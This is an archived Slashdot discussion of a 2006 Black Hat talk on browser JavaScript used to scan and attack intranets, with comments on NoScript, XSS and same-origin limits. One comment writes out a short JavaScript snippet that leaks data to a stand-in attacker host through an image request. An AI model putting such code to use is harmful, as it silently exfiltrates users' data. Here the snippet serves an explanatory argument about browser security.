Follow Slashdot blog updates by subscribing to our blog RSS feed

 



Forgot your password?
typodupeerror
×

JavaScript Malware Open The Door to the Intranet 169

An anonymous reader writes "C|Net is reporting that JavaScript malware is opening the door for hackers to attack internal networks. During the Black Hat Briefings conference Jeremiah Grossman (CTO, WhiteHat Security) '...will be showing off how to get the internal IP address, how to scan internal networks, how to fingerprint and how to enter DSL routers ... As we're attacking the intranet using the browser, we're taking complete control over the browser.' According the the article, the presence of cross-site scripting vulnerabilities (XSS) dramatically increase the possible damage that can be caused. The issue also not which-browser-is-more-secure, as all major browsers are equally at risk. Grossman says 'The users really are at the mercy of the Web sites they visit. Users could turn off JavaScript, which really isn't a solution because so many Web sites rely on it.'"
This discussion has been archived. No new comments can be posted.

JavaScript Malware Open The Door to the Intranet

Comments Filter:
  • Caveman Zonk edit headline bad.
  • NoScript (Score:5, Informative)

    by dvice_null ( 981029 ) on Sunday July 30, 2006 @06:45AM (#15810499)
    Why can't users just install Firefox and NoScript extension for it. Then Javascript will be disabled by default, but user can whitelist the sites where Javascript should be enabled. Problem solved.
    • Re:NoScript (Score:5, Informative)

      by rdwald ( 831442 ) on Sunday July 30, 2006 @06:59AM (#15810530)
      In addition to blocking JavaScript on non-whitelisted sites, NoScript also prevents Flash and Java from loading unless you specifically allow them on a case-by-case basis. All of those stupid Flash adds will be gone, but you can still view everything you want to! It's a great extension.
      • And people will do it anyway, thinking they are 'safe'.

      • Feature creep? (Score:2, Interesting)

        by vain gloria ( 831093 )
        It also blocks the <a ping> attribute, something which won't be introduced until Firefox 2 and for which it's possible to set a pref in about:config. Also, it doubles as an egg timer!

        Seriously, NoScript is great, but if I want to block flash I'll install Adblock or Flashblock. If I want to whitelist sites for javascript then I'll use NoScript. Whatever happened to the concept of simply doing one thing well?
      • These kinds of problems (and my disinterest in bells and whistles and disdain for being FORCED to turn on Java Script to read a frackin' web page) are why I want to yell, "turn that shit off!"

        So, I ONLY activate JavaScript in Konqueror on a page-by-page basis. I have it AND Java turned off by default. When the page is done, I destroy the history folder and sometimes nuke the cookies. I also in my firewall at the eth device and LAN device, as well as in the ports and as well as in Konqueror's cookies manager
        • While I don't use NoScript (instead I have an inline web-proxy to filter all my browsers) I don't consider it overreacting. My default here is no cookies, no scripts, no flash, no referrer, no blinking text, no nothing. Just the text Ma'am. This proxy rewrites the HTML on the fly ;-). There are a few, very few, sites where I do enable some things, but I've had it with sites that require anything more than basic HTML.
    • Re:NoScript (Score:5, Insightful)

      by Anonymous Coward on Sunday July 30, 2006 @07:00AM (#15810533)
      The problem is not necessiarly the web browsers (and most don't even use Firefox let alone have even heard of that that extension). The problem is the websites that don't properly take steps to protect against XSS (e.g. HTMLencode user input).

      Most recently we saw this problem in Netscape's portal.

      http://blog.outer-court.com/archive/2006-07-26-n73 .html [outer-court.com]

      Developers need to start thinking not only about how to solve the particular business problem but also about how their code could be potentially abused by attackers and take active steps to mitigate that risk.
      • Re:NoScript (Score:2, Informative)

        by Asztal_ ( 914605 )
        Funnily enough, Internet Explorer actually warns you when an untrusted site links to a trusted one. I don't know of any other browsers which do this :)
      • I am not a developer; that is, I do not do development full time professionally. I am an IT consultant, which means that I end up being a jack of all (PR related) trades. In addition to helping clients find the , I occassionally do web development. I am a functional programmer. I can write code that does the task at hand; and, I try to write clear maintainable code. I am not an expert in any particular development language; and, I do not have the time or interest to become fully conversant in the state of
        • Re:NoScript (Score:3, Insightful)

          Dude, you must be a troll, but I'll bite. That is just such a load of bullshit, you could *never* be an IT consultant. First of all, if you are coding, you aren't a consultant - a consultant "consults" i.e. you advise the customer on the best course of action to achieve a certain goal. This may be architectural, infrastructure, security, or any other field, but it is *advise* - a good consultant is too *expensive* to be sitting there knocking out code. If your customer can afford to have you write (evidentl
          • Agreed on original poster's careless attitude, but I gotta comment on your definition of consultant. I'm a consultant, and I definitely spend my share of time cranking code. Is it cost-effective to a company that has engineers on staff? No, I charge an arm & a leg. But, for one-off gigs that don't justify a hire & for companies that don't have the available coding resources it does make sense.

            I guess you can make a semantic argument that when I take this role, I'm an engineering contractor instead
          • I envy you the world you live in, it sounds so much better than the one I live in. In the one I live in, large organizations regularly hire consultants at $100+ an hour to write code; sometimes even ignoring in-house developers would could do the work cheaper. in the world I live in management frequently rewards people who save time and money by doing shoddy security and penalizes people who want to spend a few percent more to do pervasive, correct security.
          • Talk about trolling....

            Actually, IT consultants often do come in to code/design/mentor. Likewise, they are often required to help implement their own recommendations. Not surprisingly, many shops which require a consultant to come in, also lack the inhouse knowledge to implement the resulting recommendation. This may be from a lack of industry knowledge or because their in house talent can only tackle 95% of the problem domain and need help with the last 5%. And yes, sometimes that last 5% can take many
          • Come of it, have some pity of the tired beast.

            Your definition of consultant is so narrow that no camel will ever go through that needle's eyelet. Not even a mini camel.

            Consulting is understood as the poviding of professional srvices in an area, the nature of the gig may be advisory, but can be also doing technical work. What you need is somebody that can fall in a position running. Anybody capable of doing that will fit the definition of most sane people.

            In your ayatolhaic zeal you make half a point: people
        • What I don't understand is why the other two who replied to you had to be so visceral about it. A simple "No, no, here's what you can do to make sure things are secure" would have sufficed, but instead one had to resort to calling you a troll and the other had to call you a con.

          Alas, I'm realizing that is a common experience on Slashdot. I always imagined geeks who were full of themselves, I guess I had to come here to really find them.

          Anyway, just brush that off, take the good from what they had to say,
        • I can see what good a developer you are when it comes to security.. just clicking around you site tells me you run it on windows and that your webroot is D:\justinzane_com why why why would you do a print_r of your server variables on your site ??
    • Re:NoScript (Score:3, Informative)

      by Anonymous Coward
      You missed what they are saying. Even if you whitelist a website, that site can be crossscripted and become infected.
      RTFA.
    • Problem Solved? (Score:3, Interesting)

      by Petersko ( 564140 )
      "Then Javascript will be disabled by default, but user can whitelist the sites where Javascript should be enabled. Problem solved.

      The consequences of disabling Javascript can lead to a host of new problems. I used to disable javascript and enable it by whitelist. Then I registered a piece of shareware, paid by credit card, and waited. Of course since the whitelisted servers forwarded off to some other entity which provided the registration pages, it never came back. So I figured out the servers that it
      • NoScript just blocks the javascript...doesn't send it off to somewhere else nor creates any "whitelist". If you're at a site that you need Javascript to run, the little icon down in the lower right hand corner will have a pop-up menu to enable Javascript for that site you're on. You can have it enabled just for that session or permanently.

        I've used NoScript now for quite a while and I love it.
        • If you're at a site that you need Javascript to run, the little icon down in the lower right hand corner will have a pop-up menu to enable Javascript for that site you're on. You can have it enabled just for that session or permanently.
          You just described a whitelist.

          His TRANSACTION was sent off elsewhere, to another site, and because THAT site hadn't been whitelisted, he didn't get an acknowlegement that his payment had been accepted.

          I know you no-script fanboys can't stand the idea that your favorite
    • Why can't users just install Firefox and NoScript extension for it.

      Why not just install Opera 9 and use the new site management capability to manage javascripting. You can disable javascript by default for all sites, and only allow javascript to run on those sites that you trust.

    • Why can't users just run any browser, including those which don't support javascript? I would like to use Dillo, but many websites require javascript, even for things which should not. Why must they do this?
      • Because JS is the "wave of the future"! Everyone wants JS, even for crap like viewing an image! Who needs the [img] tag, let's pepper the html with document.write, because that makes everything so much easier!

        Uhh...

        Yeah really I don't get it either.

        I always browse with JS turned off and only enable it when I really, absolutely need to, or on sites I really trust. I figure, any other sites are a)using it for fluff I don't care about (like fancy dropdown menus that have no business using JS) or b) probably
      • Re:NoScript (Score:3, Insightful)

        To provide a decent UI for the user, you have to sometimes 'require' JS, for example, if you want to maintain a session when the user isn't actively clicking on links (especially when you need to know who is actually online, eg: see my link), you need to use xmlrpc (sometimes meta refresh just wont do).

        If you want a 'You have recieved mail' popup, you need JS, same with drag/drop, client side validation (along with server side obviously), client side updates of something that is happening server side (eg: t
    • Yeah, I've used NoScript.
      The problem is that so many sites pointlessly rely on javascript.
      large numbers of them are un-navigatable without javascript enabled.

      If I blocked javascript on all sites that I visited that I didn't completely trust then I wouldn't be able to use a large number of sites. It's a problem of idiot web developers who don't know what they are doing, but think it will be COOL!
      eg. non web application sites using 'AJAX' because it's the new cool thing.

      • This is a big problem. I'm a big fan of Ajax techniques, but only for use in web applications or downgradably. Downgradable design needs to be stressed and restressed to Ajax developers: build the website in HTML first, then it's easy to add Ajax goodies simply by returning false in the "onclick"s of links. If the serverside script follows the MVC pattern, it'll be easy to add a JSON-producing View to talk to JavaScript.
    • I would however like to finally obsolete the User-Agent request header for a Standards/Capabilities header. It's possible to detect JavaScript support, Flash capabilities, sure.. but it should simply be something the client tells the server in the request in the first place.

      I'm currently playing around with AJAX (shameless plug: a MySpace with better usability in PHP [robertjognkaper.com]) but because I can't see if JavaScript is on or off on the server side easily, I have to generate pages which include interface definitions fo
    • Why can't users just install Firefox and NoScript extension for it. Then Javascript will be disabled by default, but user can whitelist the sites where Javascript should be enabled. Problem solved.

      Not quite, you see that means you have to trust the web-sites you use to not allow any XSS attacks. For example, I imagine that most people would not have second thoughts about trusting altavista.com, however, clicking on a crafty link [altavista.com][1] to this site could result in serious trouble.

      The only solution that i

      • Now that is a crafty link I'd never had thought of. It really underlines the importance of sanitizing user input.
  • by pieterh ( 196118 ) on Sunday July 30, 2006 @06:46AM (#15810502) Homepage
    Giving JavaScript the power to do random network accesses may make AJAX possible, but code running in my browser has no business accessing my local intranet. For that matter, I'm uncomfortable with JavaScript applications 'phoning home' without my knowledge.

    So, the fix is to treat all attempts by JavaScript in a browser as 'hostile until proven otherwise', and to ask for user confirmation when such attempts happen. Put a firewall around the browser and treat any code running in it as dangerous by default.

    I predict 2 weeks before there's a FireFox update for this, and 2 years before MSIE fixes the problem.
    • by ergo98 ( 9391 ) on Sunday July 30, 2006 @06:54AM (#15810514) Homepage Journal
      Giving JavaScript the power to do random network accesses may make AJAX possible

      The XmlHttpRequest functionality doesn't allow "random network access", but instead is limited to calling the source website (in all browsers but IE. In IE the requests can go anywhere).

      I predict 2 weeks before there's a FireFox update for this, and 2 years before MSIE fixes the problem.

      Fix what though? The submission seems to be that someone has a big surprize that they're going to release at a conference, and for all we know they could be full of shit, talking big to get a lot of attention. Personally I would rather that this story was shelved until there's actual details that can be addressed/rebutted. Instead it's like lame nightly news teasers.

      "Coming tonight at 11 - Someting ordinary in your home that can KILL YOU! Now back to The Family Guy."
      • What might be smart is an extension hooking into the security subsystems in Firefox to allow the browser to do into "Paranoid Mode" when browsing any site not on the user's favourites or safe-list.

        Paranoid Mode would block all plugins, cookies and javascript, and optionally have a "click-to-load" button in place of content from other servers
      • (in all browsers but IE. In IE the requests can go anywhere).

        I'm not sure about that. I ran into the same security restrictions in IE that exists in the other browsers using AJAX. The only solution to the problem was to get rid of the 'www' in the URL, EVER - so users always browse on http://thesite.com./ [thesite.com.]

        By the way, about your sig:

        "Coming tonight at 11 - Someting ordinary in your home that can KILL YOU! Now back to The Family Guy."

        I hate when stations do that. It's like.. if it's so deadly isn't it kin

      • The XmlHttpRequest functionality doesn't allow "random network access"
        XmlHttpRequest doesn't allow XSS but Dynamic Scripting does, e.g [webstaa.com].
        I haven't tried using Dynamic Scripting to access local domains / addresses but it does work for non-originating sites.
        Also, I don't believe that IE does allow Cross Site AJAX.
    • by Goaway ( 82658 ) on Sunday July 30, 2006 @06:57AM (#15810527) Homepage
      document.createElement("img");
      img.src="http://myevilserver.com/phonehome.cgi?evi lspyingdata="+encodeURIComponent(evilspyingdata);
      document.body.appendElement(img);


      Oops! I just phoned home without using XMLHttpRequest! How are you going to firewall that one out?
      • As said: the problem is not the XMLHttpRequest that can be done: this is site bound in Firefox. (I think it's domain bound, not site bound actually, but ok)

        The problem is the ability of a homepage to be spread over different servers and locations. The only solution I see is getting images to be domain bound to.

        This solution will only work if it is set on all possible media that is embedded in the page, allowing only relative links for embedded media. Of course, this would totally destroy most parts of t

      • Site attempts to load image navbar1.gif. Do you want to allow it? [ ] Don't ask next time ALLOW | DENY
        Site attempts to load image navbar2.gif. Do you want to allow it? [ ] Don't ask next time ALLOW | DENY
        Site attempts to load image navbar3.gif. Do you want to allow it? [ ] Don't ask next time ALLOW | DENY
        Site attempts to load image navbar4.gif. Do you want to allow it? [ ] Don't ask next time ALLOW | DENY
        Site attempts to load image navbar5.gif. Do you want to allow it? [ ] Don't ask next time ALLOW | D
    • by roman_mir ( 125474 ) on Sunday July 30, 2006 @10:23AM (#15811251) Homepage Journal
      this is not insightful, it's silly. This is not even about JAVASCRIPT. An HTML page can access resources from anywhere on the web. And so if JAVASCRIPT is used to access one of those resources (an http request, as in HTML IMAGE tag for example,) then this problem cannot be fixed at JAVASCRIPT level.

      An HTML page can access an image on a third party server via a normal html tag, a javascript can facilitate that access, that's about it. In that http request parameters can be hidden that provide information about your session.

      The trick with JAVASCRIPT scanning your local network is actually this exact feature: a browser allowing HTML page to load resources from anywhere on the network. JAVASCRIPT is used to manipulate the DOM of the HTML, the GUI event model and the http requests. So the fundamental question is this: should and HTML page be allowed in principle to access resources from third party servers and not from its own server.

      But then you are questioning the entire Hyper Text idea - the linking of the Internet.

      This most certainly will not be fixed in the next release of ANY browser.
  • How's this news? (Score:2, Insightful)

    by Anonymous Coward
    A portscanner in javascript is trivial and it runs on the client machine behind the corporate firewall. This isn't news, this has been common knowledge for ever. This is why javascript is disabled throughout any organization that takes security seriously. I find it amusing that this only gets planted in the news when certain large tech companies are pushing ajax to replace desktop apps.

    It's not just javascript, flash content, activeX and java applets should all be disabled site-wide. Any network admin that

    • Because it worked so well for the KGB. KGB agents planted by photocopiers to ensure the wrong documents didn't get copied. Typewriters with unique typefaces in a single nonstandard size so that official documents couldn't be faked. Yes, if you are restrictive enough eventually you can bring everything crashing to a halt. However, the concept that everything is forbidden except what is compulsory has hardly proven the most successful business paradigm. IT is supposed to be an enabling technology, not a disab
    • Comment removed (Score:5, Informative)

      by account_deleted ( 4530225 ) on Sunday July 30, 2006 @11:07AM (#15811520)
      Comment removed based on user account deletion
  • by CdBee ( 742846 ) on Sunday July 30, 2006 @07:03AM (#15810538)
    For about a year now I routinely install a whitelisting firefox extension called NoScript [noscript.net]
    It blocks javascript per-site until I choose to whitelist the site: Not only do I get a great deal fewer annoyances interrupting my browsing, but it also cuts out a lot of web advertising (the AdBlock extension makes my browser drag when fully loaded with filters)
  • WMVs (Score:4, Insightful)

    by CosmeticLobotamy ( 155360 ) on Sunday July 30, 2006 @07:16AM (#15810571)
    This is slightly off-topic, but it's kind of relevent to the solution of turning javascript off. Can anyone explain to me why javascript is required in Firefox to open a .wmv file (in windows, obviously)? And more importantly, what bug makes Firefox crash about 33% of the time when visiting a site that has one on it when javascript is disabled? What are the odds that bug is overflow exploitable?
  • by Anonymous Coward on Sunday July 30, 2006 @07:56AM (#15810655)
    I have been asking for years why we can't disable javascript for all but trusted sites (in phoenix/firefox/etc) via a config facility.. The default when browsing should be OFF.

    Websites need to stop using javascript for conveying simple information. That Flash crap too. Most people just laugh when I say javascript is a security hole.

  • And it found some, but not all the web-enabled devices on my network. It found my web server and correctly identified it as Apache, found the squid proxy running on the gateway/firewall machine (identified as "unknown"), but failed to find my wireless router (through which it had to pass in order to see the rest of my network), or my print server. It also identified as "exists" several IP addresses on which no machine or device exists.

    But the Firefox "NoScript" extension completely blocked it until I told i
    • Roughly the same here in Firefox - it found the webserver on my local machine (though it couldn't identify it), didn't find the Netgear wireless router (possibly down to the password-protection on it), and about every third IP address was incorrectly identified as existing. (In Konqueror, it found my local machine, but not the webserver running on it).
    • ***but failed to find my wireless router (through which it had to pass in order to see the rest of my network), or my print server. It also identified as "exists" several IP addresses on which no machine or device exists.***

      Doesn't the second part of that make you a little nervous? One possibility is that it is finding your router and print server, but not where they are supposed to be. Could be an error in the program, but it could be some 'feature' of your network environment that you'd like to know a

    • But the Firefox "NoScript" extension completely blocked it until I told it to temporarily allow the host site.

      And that's lovely, until you realize that not everyone runs Firefox and in many corporate environments, IE is still the defacto standard. Hoping a browser will rescue application developers from bad security design is like hoping Paris Hilton wins a Nobel Prize.

      Security starts with code; if the code isn't secure, then you're asking for trouble. Programming classes in colleges and tech institut

  • by bateleur ( 814657 ) on Sunday July 30, 2006 @08:14AM (#15810718)
    So in response to a post saying a particular technology has security holes, the consensus "solution" is not to use that technology?

    That seems weak to me. By all means propose replacement solutions that do the same job, but by saying "don't use it" all you're really doing is saying "I personally have little use for it".

    Sysadmins should all disable Javascript?! Fine, go ahead, I'll move to a company with less demanding security requirements. You'll find your network's impressively secure once there are no users left.
    • Or that will be the only company with users left, after the rest are compromised.

      Running everything over http.... I would rather not be a sysadmin at a company which does that.
    • So in response to a post saying a particular technology has security holes, the consensus "solution" is not to use that technology?

      Never heard of Windows, have you?

      At what point does continually patching and repatching a fundamentially insecure technology become futile?
      • Never heard of Windows, have you?

        In my dreams. <sigh>

        It's a good example, though. I need to use Windows for two main reasons. First, because so much software is written only to run on Windows. Second, because customers use Windows and I need to be able to test and debug in an environment matching theirs. As such, no matter how buggy or insecure Windows may be either now or in the future it will never be "futile" for me to use it. (Just infuriating on occasion.)

        Javascript is not quite such a cle
  • ...I think this is only relevant to IE and MS [again]. As to sending commands to a 'router' to turn on wireless (if I even had a router that had wireless) is pants unless the 'owner' of the router wasn't the person using it (i.e. an ISP package). The interface must be open to allow this to happen.

    So, the problem is with MS (again) and 'harry home owner' type people that don't have a clue about anything, so just run with the flow [OK].
  • Missing the point (Score:4, Interesting)

    by Minwee ( 522556 ) <dcr@neverwhen.org> on Sunday July 30, 2006 @08:54AM (#15810835) Homepage
    "Users could turn off JavaScript, which really isn't a solution because so many Web sites rely on it."

    Yes it is. Users could also politely point out to the authors and administrators of the majority of web sites which rely on javascript that they really, absolutely, positively don't need it. You don't need javascript to open a link to another page. You don't need javascript to open an image in a gallery. You don't need javascript to submit a username and password. You just don't need it. I would say that using scripted actions for that is lazy and stupid, but it actually involves a good deal more work than using proper HTML. That makes it just plain stupid.

    For the rare applications which actually require javascript and don't just use it as some kind of prostetic weiner replacement there is always the option of enabling scripting on a site by site basis. Turning scripting on for http://trusted.internal.site.on.your.local.net/ [local.net] but not for http://random.russian.warez.and.porn.site/ [porn.site] really is a solution.

    • There are some cases where it makes delivery of dynamic content a bit easier by offloading some of the processing to the client, but I'm convinced that a large part of the reason some sites use Javascript is to make it harder to deeplink their site. Sort of like the old disabling-context-menus trick, which, by the way, I'm really glad doesn't work in Firefox (the dialog box saying it's disabled still pops up, but you also still get the context menu).
    • by gnuman99 ( 746007 ) on Sunday July 30, 2006 @10:52AM (#15811427)
      You don't need javascript to open a link to another page. You don't need javascript to open an image in a gallery. You don't need javascript to submit a username and password. You just don't need it.

      You don't need it - you want it. You want it to make the entire web experience better.

      From a security standpoint, everyone should be on lynx or similar browser. From the user standpoint, Javascript is essential (see maps.google.com, or gmail) for a good web experience. Images are fundamental. Web is not static HTML any more. We now live in the world of DHTML and security is just going to have to deal with it.

      Javascript is broken if it allows you to access other than non-remote resources (ie. from original website) and some settings available to it from the browser (windows size, etc..). That's what it is there for and other uses should be disabled. We already see it with the JS popup blockers. Similar security for network accesses should suffice.

      Similarly with Java, Flash and other things.
      • "You don't need it - you want it. You want it to make the entire web experience better."

        Except when I don't because it makes my entire experience much worse. A particular peeve of mine is image galleries which tie javascript actions to each thumbnail so that they will all open in the same external window. What I _want_ to do is to middle-click a few of the images which look interesting, open them each up in seperate tabs, read the article, and then look at the full sized pictures when they are all done

      • You don't need it - you want it. You want it to make the entire web experience better.

        Nonense. Using javascript for any of the things the parent mentioned is regressive. Apart from the things the sibling posters have mentioned it can also break:

        • The back button.
        • Standard link coloring.
        • Usage by the visually impaired.
        • Spidering and automated analysis of all sorts.
        • Page access on limited devices such as PDA's and kiosks.
        • Portability.
        • Maintainability.
        • User interface responsiveness.

        All this lost for ze

      • We already see it with the JS popup blockers. Similar security for network accesses should suffice.

        At what point do you STOP adding on patches as vunerabilities become known, and give-up on JS as the poorly thought-out and fundamentally insecure standard that it is?

        Images are fundamental.

        Images are no more a security threat than HTML. Sure, you can have a buffer overflow in an image, but the same goes for HTML code. Javascript is an all-together different animal. It's not being used as buffer overflows a

  • Oses or third parties now have an opportunity:

    Sandbox web-enabled applications, either individually or as a set.

    Even better: Sandbox sessions. Any address I type into my web browser, any link I open from a saved bookmark, or any link I open with a "open in new sandbox" command, gets a new sandbox.

    For home users, sandboxes get access to just the default gateway, they can't touch 127.0.0.1 or 192.168.1.x. They get read-only access to parts of the filesystem, such as where Java applets are stored, and read-
  • by shwonline ( 992049 ) on Sunday July 30, 2006 @09:04AM (#15810869)
    Ah, the simpler days of gray backgrounds and Times New Roman. None of these fancy tables, neither. And we had to walk 5 miles to school, uphill, in snow up to our hips. And 10 miles uphill to get back home. Kids today with their fancy JavaScript. No appreciation, none at all.
  • FIrefox NoScript? (Score:2, Interesting)

    by kintarowins ( 820651 )

    How anyone can just not use a simple extension to block scripts, flash, java, etc like the Firefox NoScript extension is just confusing to me. People actually seem to want to run foreign applications on their system through sites which can quite easily load anything they want.

    Make it clear to your family that the modern Internet is like the real world. Protecting your computer with either a secure Internet Explorer (eg: the default Windows 2003 IE config) or Mozilla Firefox (with the NoScript and CookieSa

  • The detection of IP addressed that aren't running webservers seems to depend entirely on the time taken for the request to fail - long delays are detected as non-existent IP addresses, whereas short ones are reported as IP addresses without a webserver. This doesn't always work - it seems to give false positives if the IP address is detected as nonexistent too quickly, and could give false negatives on slow or unreliable links.

    In addition, if a machine has a webserver on it but requests for / give an err
  • Wide Area Network distributed computing has evolved in a bad way. Web standards are not designed for remote interactive applications and operating systems are not designed for executing remote code.

    We just need to redesign the thing from the bottom up, now that we have learned the ups and downs.
  • by Anonymous Coward
    The vast, vast majority of exploits involve JavaScript in one way or another. If it were possible to just "turn off" JavaScript world-wide overnight, the number of exploits would drop down substantially. Of course you would still have the "stupid user" problem, but you can only do so much to combat that.

    As far as browsers are concerned, a large percentage of exploits are being written by / for criminal elements for profit. To this end, they maximize their profit potential by targeting the most prolific b
  • by Myria ( 562655 )
    JavaScript is not *supposed* to be able to do bad things like this. It has many safeguards built into it to avoid this.

    The real problem is that the browsers have bad code in their JavaScript implementations. This is what needs to be fixed.

    Also, web browsers probably should run using CreateRestrictedToken. I wish web browsers would run with lower privilege than your normal user applications. You could have 2 processes, one that runs at normal privilege and one that runs as a restricted token. Almost the

"An idealist is one who, on noticing that a rose smells better than a cabbage, concludes that it will also make better soup." - H.L. Mencken

Working...